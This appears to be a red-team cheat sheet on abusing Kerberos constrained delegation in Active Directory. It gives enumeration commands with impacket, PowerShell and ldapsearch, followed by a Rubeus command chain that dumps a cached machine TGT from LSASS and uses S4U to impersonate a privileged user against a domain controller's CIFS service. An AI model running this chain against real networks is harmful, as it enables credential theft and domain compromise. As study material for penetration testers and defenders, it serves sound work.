# Constrained Delegation

Constrained Delegation is a feature in the Kerberos authentication protocol that allows a service to request a Service Ticket for explicitly specified services on behalf of a user.

The *Trust this computer for delegation to specified services only* privilege must be enabled in the *Delegation* tab within the object/computer's properties.

> Attribute: msDS-AllowedToDelegateTo

<figure><img src="https://3234535347-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FkU93ONAZiHsNgO6Mhocr%2Fuploads%2FncWSUINUMyS0kkOi2pKn%2Fconstrained%20deleg.png?alt=media&#x26;token=d5adef22-0ffd-4809-a5fb-dfe81bc7c6d2" alt=""><figcaption><p>SQL can act on behalf of<br>[Image From <a href="https://training.zeropointsecurity.co.uk/courses/red-team-ops">CRTO</a>]</p></figcaption></figure>

When constrained delegation is enabled on a computer, it allows the computer to request a Service Ticket on behalf of another user for a specific service. This is done using the S4U2Self and S4U2Proxy Kerberos extensions.

## Enumeration

{% tabs %}
{% tab title="impacket-findDelegation" %}
{% embed url="<https://github.com/fortra/impacket>" %}

{% code title="Llinux (Attacker)" %}

```fish
findDelegation.py [domain]/[username]:[password]
```

{% endcode %}
{% endtab %}

{% tab title="Get-ADComputer" %}
{% embed url="<https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer?view=windowsserver2022-ps>" %}

{% code title="Windows (Target)" %}

```powershell
Get-ADComputer "Account" -Properties TrustedForDelegation,TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount
```

{% endcode %}
{% endtab %}

{% tab title="ldapsearch" %}
{% embed url="<https://docs.ldap.com/ldap-sdk/docs/tool-usages/ldapsearch.html>" %}

{% code title="Linux (Attacker)" %}

```fish
ldapsearch -x -H ldap://[DC FQCN] \
-D 'user@domain' -w 'password' \
-b 'DC=domain,DC=local' \
'(&(objectCategory=computer)(msDS-AllowedToDelegateTo=*))' \
dNSHostName sAMAccountName msDS-AllowedToDelegateTo
```

{% endcode %}
{% endtab %}
{% endtabs %}

## Exploit

{% tabs %}
{% tab title="Rubeus (Use Cached TGT)" %}
{% embed url="<https://github.com/GhostPack/Rubeus>" %}

{% embed url="<https://github.com/S3cur3Th1sSh1t/SharpImpersonation>" %}

#### Scenario

SQL$ has constrained delegation rights to CIFS/DC$, and you have access to a host where the TGT of SQL$ is stored in memory.

The goal is to extract the TGT for SQL$ and use S4U2Proxy (which requires Kerberos tickets we can obtain using S4U2Self) to gain access to CIFS/DC$.

{% code title="Windows" %}

```powershell
## Show Cached Tickets
Rubeus.exe triage

## Extract The TGT Using Its LUID (/nowrap To Make It Copy Friendly)
Rubeus.exe dump /luid:[luid of target tgt] /nowrap

## Perform a S4U2Self to obtain TGS for SQL$
Rubeus.exe s4u /impersonateuser:[privileged user] /msdsspn:cifs/dc.[domain] /user:sql$ /ticket:[tgt] /nowrap

## Perform a S4U2Proxy to obtain TGS for CIFS/DC$

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[privileged user] /password:AnyPassword /ticket:[tgs for sql$]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"
```

{% endcode %}

{% hint style="info" %}
You must have elevated privileges on the target computer in order to dump TGTs from LSASS.
{% endhint %}
{% endtab %}
{% endtabs %}